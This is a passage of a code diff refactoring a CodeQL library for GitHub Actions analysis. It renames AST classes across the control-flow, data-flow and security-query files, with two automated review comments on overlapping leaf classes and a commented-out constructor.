@@ -534,24 +543,24 @@ class EnvCtxAccessExpr extends CtxAccessExpr { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ matrix.foo }}` */ -class MatrixCtxAccessExpr extends CtxAccessExpr { +class MatrixExpression extends ContextExpression { string fieldName; - MatrixCtxAccessExpr() { + MatrixExpression() { expr.regexpMatch(matrixCtxRegex()) and fieldName = expr.regexpCapture(matrixCtxRegex(), 1) } override string getFieldName() { result = fieldName } - override Expression getRefExpr() { - exists(WorkflowStmt w | - w.getStrategyStmt().getMatrixVariableExpr(fieldName) = result and + override AstNode getTarget() { + exists(Workflow w | + w.getStrategy().getMatrixVariableExpr(fieldName) = result and w.getAChildNode*() = this ) or - exists(JobStmt j | - j.getStrategyStmt().getMatrixVariableExpr(fieldName) = result and + exists(Job j | + j.getStrategy().getMatrixVariableExpr(fieldName) = result and j.getAChildNode*() = this ) } diff --git a/ql/lib/codeql/actions/controlflow/BasicBlocks.qll b/ql/lib/codeql/actions/controlflow/BasicBlocks.qll index cdc7b0cf24f..af5e0f62552 100644 --- a/ql/lib/codeql/actions/controlflow/BasicBlocks.qll +++ b/ql/lib/codeql/actions/controlflow/BasicBlocks.qll @@ -442,4 +442,3 @@ class ConditionBlock extends BasicBlock { */ predicate controls(BasicBlock controlled, BooleanSuccessor s) { controls(this, controlled, s) } } - diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index b8137172b8c..2bc86723493 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll 
@@ -83,9 +83,9 @@ module Completion { module CfgScope { abstract class CfgScope extends AstNode { } - class WorkflowScope extends CfgScope instanceof WorkflowStmt { } + class WorkflowScope extends CfgScope instanceof Workflow { } - class CompositeActionScope extends CfgScope instanceof CompositeActionStmt { } + class CompositeActionScope extends CfgScope instanceof CompositeAction { } } private module Implementation implements CfgShared::InputSig { @@ -119,13 +119,13 @@ private module Implementation implements CfgShared::InputSig { int maxSplits() { result = 0 } predicate scopeFirst(CfgScope scope, AstNode e) { - first(scope.(WorkflowStmt), e) or - first(scope.(CompositeActionStmt), e) + first(scope.(Workflow), e) or + first(scope.(CompositeAction), e) } predicate scopeLast(CfgScope scope, AstNode e, Completion c) { - last(scope.(WorkflowStmt), e, c) or - last(scope.(CompositeActionStmt), e, c) + last(scope.(Workflow), e, c) or + last(scope.(CompositeAction), e, c) } predicate successorTypeIsSimple(SuccessorType t) { t instanceof NormalSuccessor } @@ -143,14 +143,14 @@ private import CfgImpl private import Completion private import CfgScope -private class CompositeActionTree extends StandardPreOrderTree instanceof CompositeActionStmt { +private class CompositeActionTree extends StandardPreOrderTree instanceof CompositeAction { override ControlFlowTree getChildNode(int i) { result = - rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | ( - child = this.(CompositeActionStmt).getInputsStmt() or - child = this.(CompositeActionStmt).getOutputsStmt() or - child = this.(CompositeActionStmt).getRunsStmt() + child = this.(CompositeAction).getInputs() or + child = this.(CompositeAction).getOutputs() or + child = this.(CompositeAction).getRuns() ) and l = child.getLocation() | 
@@ -161,21 +161,21 @@ private class CompositeActionTree extends StandardPreOrderTree instanceof Compos } } -private class RunsTree extends StandardPreOrderTree instanceof RunsStmt { - override ControlFlowTree getChildNode(int i) { result = super.getStepStmt(i) } +private class RunsTree extends StandardPreOrderTree instanceof Runs { + override ControlFlowTree getChildNode(int i) { result = super.getStep(i) } } -private class WorkflowTree extends StandardPreOrderTree instanceof WorkflowStmt { +private class WorkflowTree extends StandardPreOrderTree instanceof Workflow { override ControlFlowTree getChildNode(int i) { - if this instanceof ReusableWorkflowStmt + if this instanceof ReusableWorkflow then result = - rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | ( - child = this.(ReusableWorkflowStmt).getInputsStmt() or - child = this.(ReusableWorkflowStmt).getOutputsStmt() or - child = this.(ReusableWorkflowStmt).getStrategyStmt() or - child = this.(ReusableWorkflowStmt).getAJobStmt() + child = this.(ReusableWorkflow).getInputs() or + child = this.(ReusableWorkflow).getOutputs() or + child = this.(ReusableWorkflow).getStrategy() or + child = this.(ReusableWorkflow).getAJob() ) and l = child.getLocation() | @@ -185,10 +185,10 @@ private class WorkflowTree extends StandardPreOrderTree instanceof WorkflowStmt ) else result = - rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | ( - child = super.getAJobStmt() or - child = super.getStrategyStmt() + child = super.getAJob() or + child = super.getStrategy() ) and l = child.getLocation() | 
@@ -199,10 +199,10 @@ private class WorkflowTree extends StandardPreOrderTree instanceof WorkflowStmt } } -private class InputsTree extends StandardPreOrderTree instanceof InputsStmt { +private class InputsTree extends StandardPreOrderTree instanceof Inputs { override ControlFlowTree getChildNode(int i) { result = - rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | child = super.getInputExpr(_) and l = child.getLocation() | child @@ -212,12 +212,10 @@ private class InputsTree extends StandardPreOrderTree instanceof InputsStmt { } } -private class InputExprTree extends LeafTree instanceof InputExpr { } - -private class OutputsTree extends StandardPreOrderTree instanceof OutputsStmt { +private class OutputsTree extends StandardPreOrderTree instanceof Outputs { override ControlFlowTree getChildNode(int i) { result = - rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | child = super.getOutputExpr(_) and l = child.getLocation() | child @@ -227,12 +225,10 @@ private class OutputsTree extends StandardPreOrderTree instanceof OutputsStmt { } } -private class OutputExprTree extends LeafTree instanceof OutputExpr { } - -private class StrategyTree extends StandardPreOrderTree instanceof StrategyStmt { +private class StrategyTree extends StandardPreOrderTree instanceof Strategy { override ControlFlowTree getChildNode(int i) { result = - rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | child = super.getMatrixVariableExpr(_) and l = child.getLocation() | child 
@@ -242,17 +238,15 @@ private class StrategyTree extends StandardPreOrderTree instanceof StrategyStmt } } -private class MatrixVariableExprTree extends LeafTree instanceof MatrixVariableExpr { } - -private class JobTree extends StandardPreOrderTree instanceof JobStmt { +private class JobTree extends StandardPreOrderTree instanceof Job { override ControlFlowTree getChildNode(int i) { result = - rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | ( - child = super.getAStepStmt() or - child = super.getOutputsStmt() or - child = super.getStrategyStmt() or - child = super.getUsesExpr() + child = super.getAStep() or + child = super.getOutputs() or + child = super.getStrategy() or + child = super.getUses() ) and l = child.getLocation() | @@ -263,12 +257,10 @@ private class JobTree extends StandardPreOrderTree instanceof JobStmt { } } -private class UsesExprTree extends LeafTree instanceof UsesExpr { } - -private class UsesTree extends StandardPreOrderTree instanceof UsesExpr { +private class UsesTree extends StandardPreOrderTree instanceof Uses { override ControlFlowTree getChildNode(int i) { result = - rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | (child = super.getArgumentExpr(_) or child = super.getEnvExpr(_)) and l = child.getLocation() | @@ -279,11 +271,10 @@ private class UsesTree extends StandardPreOrderTree instanceof UsesExpr { } } -private class RunTree extends StandardPreOrderTree instanceof RunExpr { - //override ControlFlowTree getChildNode(int i) { result = super.getScriptExpr() and i = 0 } +private class RunTree extends StandardPreOrderTree instanceof Run { override ControlFlowTree getChildNode(int i) { result = - rank[i](Expression child, Location l | + rank[i](AstNode child, Location l | (child = super.getEnvExpr(_) or child = super.getScriptExpr()) and l = child.getLocation() | 
@@ -294,4 +285,16 @@ private class RunTree extends StandardPreOrderTree instanceof RunExpr { } } -private class ExprAccessTree extends LeafTree instanceof ExprAccessExpr { } +private class UsesLeaf extends LeafTree instanceof Uses { } + +private class InputExprTree extends LeafTree instanceof InputExpr { } + +private class OutputExprTree extends LeafTree instanceof OutputExpr { } + +private class MatrixVariableExprTree extends LeafTree instanceof MatrixVariableExpr { } + +private class EnvExprTree extends LeafTree instanceof EnvExpr { } + +private class ExprAccessTree extends LeafTree instanceof ContextExpression { } + +private class AstNodeLeaf extends LeafTree instanceof Expression { } diff --git a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll index 594b6017729..479078fe18b 100644 --- a/ql/lib/codeql/actions/dataflow/ExternalFlow.qll +++ b/ql/lib/codeql/actions/dataflow/ExternalFlow.qll @@ -42,7 +42,7 @@ predicate sinkModel(string action, string version, string input, string kind) { predicate externallyDefinedSource( DataFlow::Node source, string sourceType, string fieldName, string trigger ) { - exists(UsesExpr uses, string action, string version, string kind | + exists(Uses uses, string action, string version, string kind | sourceModel(action, version, fieldName, trigger, kind) and uses.getCallee() = action.toLowerCase() and ( @@ -65,7 +65,7 @@ predicate externallyDefinedSource( predicate externallyDefinedStoreStep( DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c ) { - exists(UsesExpr uses, string action, string version, string input, string output | + exists(Uses uses, string action, string version, string input, string output | summaryModel(action, version, input, output, "taint") and c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output.", "")) and uses.getCallee() = action.toLowerCase() and 
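Review bot: The last two classes added at the end of Cfg.qll overlap, and the name of the second is misleading: `AstNodeLeaf` is declared `instanceof Expression`, not `AstNode`, and `ExprAccessTree` covers `ContextExpression`, which Ast.qll in this same commit makes a subclass of `Expression`. A single `private class ExpressionLeaf extends LeafTree instanceof Expression { }` would express the same thing. `UsesLeaf` also makes every `Uses` a `LeafTree` while `UsesTree` just above makes it a `StandardPreOrderTree`; that pairing predates this commit, but a short comment saying which behaviour is intended would help the next reader.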
@@ -87,7 +87,7 @@ predicate externallyDefinedStoreStep( } predicate externallyDefinedSink(DataFlow::ExprNode sink, string kind) { - exists(UsesExpr uses, string action, string version, string input | + exists(Uses uses, string action, string version, string input | ( if input.trim().matches("env.%") then sink.asExpr() = uses.getEnvExpr(input.trim().replaceAll("env.", "")) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 0e82498bfc1..c30c963afdb 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -114,7 +114,7 @@ private class EventSource extends RemoteFlowSource { string trigger; EventSource() { - exists(ExprAccessExpr e, string context | this.asExpr() = e and context = e.getExpression() | + exists(Expression e, string context | this.asExpr() = e and context = e.getExpression() | trigger = ["issues", "issue_comment"] and isExternalUserControlledIssue(context) or trigger = ["pull_request_target", "pull_request_review", "pull_request_review_comment"] and @@ -158,9 +158,9 @@ private class ExternallyDefinedSource extends RemoteFlowSource { * An input for a Composite Action */ private class CompositeActionInputSource extends RemoteFlowSource { - CompositeActionStmt c; + CompositeAction c; - CompositeActionInputSource() { c.getInputsStmt().getInputExpr(_) = this.asExpr() } + CompositeActionInputSource() { c.getInputs().getInputExpr(_) = this.asExpr() } override string getSourceType() { result = "Composite action input" } diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index bc0c782e9ff..64df342ae9b 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll 
@@ -34,7 +34,7 @@ class AdditionalTaintStep extends Unit { * echo "foo=$(echo $BODY)" >> "$GITHUB_OUTPUT" */ predicate runEnvToScriptStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(RunExpr r, string varName, string output | + exists(Run r, string varName, string output | c = any(DataFlow::FieldContent ct | ct.getName() = output.replaceAll("output\\.", "")) and r.getEnvExpr(varName) = pred.asExpr() and exists(string script, string line | diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index b9aafb8ec94..62975959b39 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -54,21 +54,22 @@ DataFlowType getNodeType(Node node) { any() } predicate nodeIsHidden(Node node) { none() } class DataFlowExpr extends Cfg::Node { - DataFlowExpr() { this.getAstNode() instanceof Expression } + DataFlowExpr() { any() } + //DataFlowExpr() { this.getAstNode() instanceof Expression } } /** * A call corresponds to a Uses steps where a 3rd party action or a reusable workflow get called */ class DataFlowCall instanceof Cfg::Node { - DataFlowCall() { super.getAstNode() instanceof UsesExpr } + DataFlowCall() { super.getAstNode() instanceof Uses } /** Gets a textual representation of this element. */ string toString() { result = super.toString() } Location getLocation() { result = super.getLocation() } - string getName() { result = super.getAstNode().(UsesExpr).getCallee() } + string getName() { result = super.getAstNode().(Uses).getCallee() } DataFlowCallable getEnclosingCallable() { result = super.getScope() } } 
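Review bot: `DataFlowExpr() { any() }` in DataFlowPrivate.qll now admits every `Cfg::Node`, and the old restriction is left behind as a commented-out line (`//DataFlowExpr() { this.getAstNode() instanceof Expression }`) with no explanation. This class presumably bounds what the data-flow library treats as an expression node, so the widening should read as a deliberate choice rather than a debugging leftover. I would delete the commented-out line and put a one-line doc comment on the class, for example `/** Any CFG node; not restricted to Expression, which now only models ${{ }} strings. */`, if that is indeed the reason.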
@@ -82,11 +83,11 @@ class DataFlowCallable instanceof Cfg::CfgScope { Location getLocation() { result = super.getLocation() } string getName() { - if this instanceof ReusableWorkflowStmt - then result = this.(ReusableWorkflowStmt).getLocation().getFile().getRelativePath() + if this instanceof ReusableWorkflow + then result = this.(ReusableWorkflow).getLocation().getFile().getRelativePath() else - if this instanceof CompositeActionStmt - then result = this.(CompositeActionStmt).getLocation().getFile().getRelativePath() + if this instanceof CompositeAction + then result = this.(CompositeAction).getLocation().getFile().getRelativePath() else none() } } @@ -134,9 +135,9 @@ predicate typeStrongerThan(DataFlowType t1, DataFlowType t2) { none() } newtype TContent = TFieldContent(string name) { // We only use field flow for steps and jobs outputs, not for accessing other context fields such as env, matrix or inputs - name = any(StepsCtxAccessExpr a).getFieldName() or - name = any(NeedsCtxAccessExpr a).getFieldName() or - name = any(JobsCtxAccessExpr a).getFieldName() + name = any(StepsExpression a).getFieldName() or + name = any(NeedsExpression a).getFieldName() or + name = any(JobsExpression a).getFieldName() } predicate forceHighPrecision(Content c) { c instanceof FieldContent } @@ -149,14 +150,14 @@ ContentApprox getContentApprox(Content c) { result = c } * Made a string to match the ArgumentPosition type. */ class ParameterPosition extends string { - ParameterPosition() { exists(any(ReusableWorkflowStmt w).getInputsStmt().getInputExpr(this)) } + ParameterPosition() { exists(any(ReusableWorkflow w).getInputs().getInputExpr(this)) } } /** * Made a string to match `With:` keys in the AST */ class ArgumentPosition extends string { - ArgumentPosition() { exists(any(UsesExpr e).getArgumentExpr(this)) } + ArgumentPosition() { exists(any(Uses e).getArgumentExpr(this)) } } /** 
@@ -172,11 +173,11 @@ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = * field name. */ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(UsesExpr astFrom, StepsCtxAccessExpr astTo | + exists(Uses astFrom, StepsExpression astTo | externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName(), _) and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and - astTo.getRefExpr() = astFrom + astTo.getTarget() = astFrom ) } @@ -189,11 +190,11 @@ predicate stepsCtxLocalStep(Node nodeFrom, Node nodeTo) { * field name. */ predicate needsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(UsesExpr astFrom, NeedsCtxAccessExpr astTo | + exists(Uses astFrom, NeedsExpression astTo | externallyDefinedSource(nodeFrom, _, "output." + astTo.getFieldName(), _) and astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and - astTo.getRefExpr() = astFrom + astTo.getTarget() = astFrom ) } @@ -202,10 +203,10 @@ predicate needsCtxLocalStep(Node nodeFrom, Node nodeTo) { * e.g. ${{ inputs.foo }} */ predicate inputsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, InputsCtxAccessExpr astTo | + exists(AstNode astFrom, InputsExpression astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and - astTo.getRefExpr() = astFrom + astTo.getTarget() = astFrom ) } @@ -214,10 +215,10 @@ predicate inputsCtxLocalStep(Node nodeFrom, Node nodeTo) { * e.g. ${{ matrix.foo }} */ predicate matrixCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, MatrixCtxAccessExpr astTo | + exists(AstNode astFrom, MatrixExpression astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and - astTo.getRefExpr() = astFrom + astTo.getTarget() = astFrom ) } 
@@ -226,12 +227,12 @@ predicate matrixCtxLocalStep(Node nodeFrom, Node nodeTo) { * e.g. ${{ env.foo }} */ predicate envCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, EnvCtxAccessExpr astTo | + exists(Expression astFrom, EnvExpression astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and ( externallyDefinedSource(nodeFrom, _, "env." + astTo.getFieldName(), _) or - astTo.getRefExpr() = astFrom + astTo.getTarget() = astFrom ) ) } @@ -266,17 +267,17 @@ predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFr predicate jumpStep(Node nodeFrom, Node nodeTo) { none() } /** - * Holds if a CtxAccessExpr reads a field from a job (needs/jobs), step (steps) output via a read of `c` (fieldname) + * Holds if a Expression reads a field from a job (needs/jobs), step (steps) output via a read of `c` (fieldname) */ predicate ctxFieldReadStep(Node node1, Node node2, ContentSet c) { - exists(CtxAccessExpr access | + exists(ContextExpression access | ( - access instanceof NeedsCtxAccessExpr or - access instanceof StepsCtxAccessExpr or - access instanceof JobsCtxAccessExpr + access instanceof NeedsExpression or + access instanceof StepsExpression or + access instanceof JobsExpression ) and c = any(FieldContent ct | ct.getName() = access.getFieldName()) and - node1.asExpr() = access.getRefExpr() and + node1.asExpr() = access.getTarget() and node2.asExpr() = access ) } @@ -294,7 +295,7 @@ predicate readStep(Node node1, ContentSet c, Node node2) { ctxFieldReadStep(node * using the output variable name as the access path */ predicate fieldStoreStep(Node node1, Node node2, ContentSet c) { - exists(OutputsStmt out, string fieldName | + exists(Outputs out, string fieldName | node1.asExpr() = out.getOutputExpr(fieldName) and node2.asExpr() = out and c = any(FieldContent ct | ct.getName() = fieldName) 
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 5fe3c741735..a8434cdb603 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -52,11 +52,11 @@ class ParameterNode extends ExprNode { ParameterNode() { this.asExpr() = input and - input = any(InputsStmt s).getInputExpr(_) + input = any(Inputs s).getInputExpr(_) } predicate isParameterOf(DataFlowCallable c, ParameterPosition pos) { - input = c.(ReusableWorkflowStmt).getInputsStmt().getInputExpr(pos) + input = c.(ReusableWorkflow).getInputs().getInputExpr(pos) } override string toString() { result = "input " + input.toString() } @@ -81,12 +81,12 @@ class CallNode extends ExprNode { * An argument to a Uses step (call). */ class ArgumentNode extends ExprNode { - ArgumentNode() { this.getCfgNode().getAstNode() = any(UsesExpr e).getArgumentExpr(_) } + ArgumentNode() { this.getCfgNode().getAstNode() = any(Uses e).getArgumentExpr(_) } predicate argumentOf(DataFlowCall call, ArgumentPosition pos) { this.getCfgNode() = call.(Cfg::Node).getASuccessor+() and call.(Cfg::Node).getAstNode() = - any(UsesExpr e | e.getArgumentExpr(pos) = this.getCfgNode().getAstNode()) + any(Uses e | e.getArgumentExpr(pos) = this.getCfgNode().getAstNode()) } } @@ -94,11 +94,11 @@ class ArgumentNode extends ExprNode { * Reusable workflow output nodes */ class ReturnNode extends ExprNode { - private OutputsStmt outputs; + private Outputs outputs; ReturnNode() { this.asExpr() = outputs and - outputs = any(ReusableWorkflowStmt s).getOutputsStmt() + outputs = any(ReusableWorkflow s).getOutputs() } ReturnKind getKind() { result = TNormalReturn() } diff --git a/ql/src/Debug/partial.ql b/ql/src/Debug/partial.ql index c0a694455dc..fbdf9ca7daa 100644 --- a/ql/src/Debug/partial.ql +++ b/ql/src/Debug/partial.ql 
@@ -15,7 +15,7 @@ import PartialFlow::PartialPathGraph private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and - source.getLocation().getFile().getBaseName() = "matrix.yml" + source.getLocation().getFile().getBaseName() = "argus_case_study.yml" } predicate isSink(DataFlow::Node sink) { none() } diff --git a/ql/src/Security/CWE-020/CompositeActionsSinks.ql b/ql/src/Security/CWE-020/CompositeActionsSinks.ql index 525307bcc28..5bff6abc7bb 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSinks.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSinks.ql @@ -18,14 +18,14 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or + exists(Run e | e.getScriptExpr() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - exists(CompositeActionStmt c | c.getInputsStmt().getInputExpr(_) = source.asExpr()) + exists(CompositeAction c | c.getInputs().getInputExpr(_) = source.asExpr()) } predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql index b3eb6d348a8..12703a6cff2 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSources.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql 
@@ -20,11 +20,11 @@ private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and not source instanceof DataFlow::ParameterNode and - exists(CompositeActionStmt c | c.getAChildNode*() = source.asExpr()) + exists(CompositeAction c | c.getAChildNode*() = source.asExpr()) } predicate isSink(DataFlow::Node sink) { - exists(CompositeActionStmt c | c.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) + exists(CompositeAction c | c.getOutputs().getOutputExpr(_) = sink.asExpr()) } predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { diff --git a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql index b451d9d1bda..e5933a73b36 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSummaries.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSummaries.ql @@ -18,11 +18,11 @@ import codeql.actions.dataflow.ExternalFlow private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - exists(CompositeActionStmt c | c.getInputsStmt().getInputExpr(_) = source.asExpr()) + exists(CompositeAction c | c.getInputs().getInputExpr(_) = source.asExpr()) } predicate isSink(DataFlow::Node sink) { - exists(CompositeActionStmt c | c.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) + exists(CompositeAction c | c.getOutputs().getOutputExpr(_) = sink.asExpr()) } } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql index 9317b900158..1e1f942b200 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSinks.ql 
@@ -18,14 +18,14 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or + exists(Run e | e.getScriptExpr() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - exists(ReusableWorkflowStmt w | w.getInputsStmt().getInputExpr(_) = source.asExpr()) + exists(ReusableWorkflow w | w.getInputs().getInputExpr(_) = source.asExpr()) } predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql index eeea688b273..7bcea3d45b0 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSources.ql @@ -20,11 +20,11 @@ private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource and not source instanceof DataFlow::ParameterNode and - exists(ReusableWorkflowStmt w | w.getAChildNode*() = source.asExpr()) + exists(ReusableWorkflow w | w.getAChildNode*() = source.asExpr()) } predicate isSink(DataFlow::Node sink) { - exists(ReusableWorkflowStmt w | w.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) + exists(ReusableWorkflow w | w.getOutputs().getOutputExpr(_) = sink.asExpr()) } predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet set) { diff --git a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql index 3949488e129..5ac0c299929 100644 --- a/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql +++ b/ql/src/Security/CWE-020/ReusableWorkflowsSummaries.ql 
@@ -18,11 +18,11 @@ import codeql.actions.dataflow.ExternalFlow private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { - exists(ReusableWorkflowStmt w | w.getInputsStmt().getInputExpr(_) = source.asExpr()) + exists(ReusableWorkflow w | w.getInputs().getInputExpr(_) = source.asExpr()) } predicate isSink(DataFlow::Node sink) { - exists(ReusableWorkflowStmt w | w.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) + exists(ReusableWorkflow w | w.getOutputs().getOutputExpr(_) = sink.asExpr()) } } diff --git a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql index a6baf060c9d..63f1a7a9d3a 100644 --- a/ql/src/Security/CWE-094/CriticalExpressionInjection.ql +++ b/ql/src/Security/CWE-094/CriticalExpressionInjection.ql @@ -19,7 +19,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or + exists(Run e | e.getScriptExpr() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } @@ -40,8 +40,7 @@ where source .getNode() .asExpr() - .(Statement) - .getEnclosingWorkflowStmt() + .getEnclosingWorkflow() .hasTriggerEvent(source.getNode().(RemoteFlowSource).getATriggerEvent()) select sink.getNode(), source, sink, "Potential expression injection, which may be controlled by an external user." diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index c34fcb74bbc..b13bf88abe6 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql 
@@ -19,7 +19,7 @@ import codeql.actions.dataflow.ExternalFlow private class ExpressionInjectionSink extends DataFlow::Node { ExpressionInjectionSink() { - exists(RunExpr e | e.getScriptExpr() = this.asExpr()) or + exists(Run e | e.getScriptExpr() = this.asExpr()) or externallyDefinedSink(this, "expression-injection") } } diff --git a/ql/src/Security/CWE-275/MissingActionsPermissions.ql b/ql/src/Security/CWE-275/MissingActionsPermissions.ql index a4cecf18b78..9373bf808e3 100644 --- a/ql/src/Security/CWE-275/MissingActionsPermissions.ql +++ b/ql/src/Security/CWE-275/MissingActionsPermissions.ql @@ -13,11 +13,11 @@ import actions -from WorkflowStmt workflow, JobStmt job +from Workflow workflow, Job job where - job = workflow.getAJobStmt() and + job = workflow.getAJob() and ( - not exists(workflow.getPermissionsStmt()) and - not exists(job.getPermissionsStmt()) + not exists(workflow.getPermissions()) and + not exists(job.getPermissions()) ) select job, "Actions Job or Workflow does not set permissions" diff --git a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql index 3c951a4e0b0..34bcbd7b060 100644 --- a/ql/src/Security/CWE-829/UnpinnedActionsTag.ql +++ b/ql/src/Security/CWE-829/UnpinnedActionsTag.ql @@ -21,10 +21,10 @@ private predicate isTrustedOrg(string repo) { exists(string org | org in ["actions", "github", "advanced-security"] | repo.matches(org + "/%")) } -from StepUsesExpr uses, string repo, string version, WorkflowStmt workflow, string name +from StepUses uses, string repo, string version, Workflow workflow, string name where uses.getCallee() = repo and - uses.getEnclosingWorkflowStmt() = workflow and + uses.getEnclosingWorkflow() = workflow and ( workflow.getName() = name or diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index 3c745b5d84a..ed96d5f07c1 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql 
